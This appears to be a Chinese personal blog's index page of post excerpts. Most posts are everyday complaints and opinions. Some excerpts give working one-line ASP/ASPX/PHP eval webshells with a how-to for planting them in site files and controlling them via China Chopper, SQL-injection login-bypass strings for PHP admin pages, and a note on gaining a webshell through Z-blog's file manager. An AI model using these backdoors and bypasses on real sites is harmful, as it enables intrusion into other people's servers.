光的传人

欢迎访问随笔最新发布

快云VPS

Z-blog Phoenix版本后台文件管理可webshell,其他版本未测

今天体验了一下Z-blog Phoenix版本,后台比2.0版本的强大了许多!可在线安装主题(主题还是太少了,好看的主题更少~),以及更人性化的设置。

看到了文件管理,就忍不住测试了下,没想到真的可以webshell~

记得有一个大牛在评价某CMS的时候说了句话:官方不管后台能不能webshell,认为能进后台的只有管理员~

这算是故意弄得功能呢,还是没有对安全这一块做好防范?

管他呢~

...

竟然一个多月没有写文章了

首先给各位网友拜年了,虽然有点晚,但是还是真心的祝愿大家在新的一年里腰包变得鼓鼓的!恭喜发财!

不知不觉,竟然又是一年过去了~

抽时间得总结一下,春节期间虽然忙,但是没赚到钱,这真是瞎忙活啊!

调整调整方向,新的一年继续奋勇向前!

相信互联网是大势所趋!加油!

...

CMCC您的账号状态不正常!

 刚才想用移动的CMCC下载点东西,居然弹出:您的账号状态不正常!曰~这还没用到一年呢!就出问题了,擦!赶紧查一下,原来是欠费了!可是30元WLAN升级版惊喜套餐:  剩余192.00小时 共200.00小时 ,还没用完呢!

移动的霸王条款受不了~还有买移动CMCC帐号时,一定要看好里面的余额!现在我的还差三个月就已经欠费了!卖家真够贱的!看来只好充值了!

...

一句话与中国菜刀的用法

 注:本文转载,仅用来个人学习。

菜刀是用来连一句话的,asp、aspx、php的一句话菜刀都可以连,只是这几种一句话语句不一样。
asp的一句话是:<%eval request(“pass”)%>
aspx的一句话是:<%@ Page Language=”Jscript”%><%eval(Request.Item["pass"],”unsafe”);%>
php的一句话是:<?php @eval($_POST['pass']);?>
这几个一句话的密码都是pass,也就是双引号或者单引号包含着的这部分,比如我想把asp的一句话的密码改成drvfan,那么改完之后就是这样的:
<%eval request(“pass”)%>
其他同理。
要想连一句话,你首先得把这个一句话插入到一个正常的网站文件中,asp的一句话插入到asp文件里,aspx的一句话插入到aspx文件里,php同理。
当然,你也可以把一句话单独写在一个文件里,比如你新建了一个asp.php文件,这个asp.php文件的全部内容就只有一个一句话,也是可以的。
插入了一句话木马,下面就是连接了。
在菜刀主界面,右击,选择“添加”,
在“地址”这里填上你插入一句话的文件的地址,后边的那个小框填的是你的一句话的密码,其他的可以不用填,
填完之后单击“添加”,就可以了。
添加完毕后,你的这个一句话的shell会显示到菜刀主界面里,鼠标右击它,选择“文件管理”,就可以看到网站上的文件了
所以,使用菜刀,一定要熟练运用一句话
asp的一句话是:<%eval request(“pass”)%>
aspx的一句话是:<%@ Page Language=”Jscript”%><%eval(Request.Item["pass"],”unsafe”);%>
php的一句话是:<?php @eval($_POST['pass']);?>
在菜刀工具里还有一个功能,是“虚拟终端”,也是在右键菜单里的,这个相当于webshell中的执行DOS命令的功能
如果你的shell有权执行DOS命令,那么直接输入命令回车就可以看到结果了

...

从360图标变化观其野心

 突然想到了一个问题:360以前的图标挺漂亮的,为什么换了呢?看图说话:

吃了金山网盾,我还要吃企鹅、可牛、瑞星、遨游、度娘……还有你!从LOGO的变化,从体型的变化,就可以看出,安全这一领域完全满足不了360的野心……狼子野心,路人皆知!

...

堵车,为什么会堵车,北京堵车,大城市堵车终究原因在哪?房价是罪魁祸首!

今天早上又是非常堵的来上班,公交车里面人挤人,非常的拥挤,外面同样是车挤车堵得根本走不动。汽车,作为省时省力的代步工具完全丧失了它的强大优势!堵车,到底是什么引起的呢?北京作为全国首都,全国第二大城市为什么堵车最严重?有没有好好思考过这个问题!?

表面上看,大城市堵车,是因为车太多了,或者因为各大路口处不合理设计造成的。可是再往深里思考一下,真的只是因为这样么?

公交车,地铁里为什么也是这么多人,挤得都进不去人了还是往里挤,因为挤不上车就会迟到……

...

本来没空写这篇文章的

 本来没时间写这篇文章的,但是这件事情,抽点时间还是要说的!

有些人真的很不地道,友情链接只看到了“链接”没看到前面赫赫的写着“友情”两个大字!试问一下,各位站长交换友情链接是为了什么的?难道只是仅仅为了讨好度娘?如果是这样,请不要跟我换链接,我做博客仅仅是为了写好博客,就算是没有了百度快照,我也是无所谓的,因为谷哥会为我的原创打分!

今天早上,一个网友qq消息来说,把他的链接去掉~虽然属于过河拆桥,但是能给你打声招呼也算是难能可贵了。于是一查链接,我勒个去,居然有两三个单方面撤链,我博客的竟然也有两个pr1的也单方面撤链,太不地道了~想当初是给我留言换的链接~

......

友情链接之——忘恩负义

 最讨厌的一种人:忘恩负义的小人!

之前做过的一个论坛也算是有点权重了,虽然pr1,但是对于新站来说,能跟他们交换友情链接也算是对他们很好了!谁知道,你的善心,你的好心却被当成驴肝肺!他们权重上来了之后就不声不响的把你的链接给删除了!

很久没有管理论坛,发现外链吧论坛百度收录居然过万了!看来这个论坛还是有点作用的!做的几个新网站也多亏了这个论坛带来的一点权重,才使得pr的能够得以上升!在论坛里加了点广告,就看到友情链接不少,好久没有检测了,不知道有多少贱人把我的链接给单方面删除了!

......

PHP万能密码

说实话如果一个网站的前台都是注入漏洞,那么凭经验,万能密码进后台的几率基本上是百分之百。可是有的人说对PHP的站如果是GPC魔术转换开启,就会对特殊符号转义,就彻底杜绝了PHP注入。

其实说这话的人没有好好想过,更没有尝试过用万能密码进PHP的后台。其实GPC魔术转换是否开启对用万能密码进后台一点影响也没有。如果你用这样的万能密码'or'='or',当然进不去,理由是GPC开启的时候单引号会被转换。PHP注入时我常用的万能密码是:'or 1=1/*.

那我们分析一下为什么这可以进后台。

......

捐你妹~《北京政府紧急呼吁向灾民捐款》

 在群里看到一篇文章别的不错,特此转载(本博客很少转载的哦)!

腾讯网发出《北京政府紧急呼吁向灾民捐款)的新闻之后,瞬间就N万多条骂论.

大家看看今年他们替我们捐的款吧...

  1、2012年1月18日,中国向非盟提供6亿美元无偿援助

  2、2012年2月下旬,中国援助朝鲜6亿美元

  3、6月7日,向上合成员国提供100亿美元贷款

  4、7月17日,向菲律宾提供1.12亿美元改造供水管道

...

...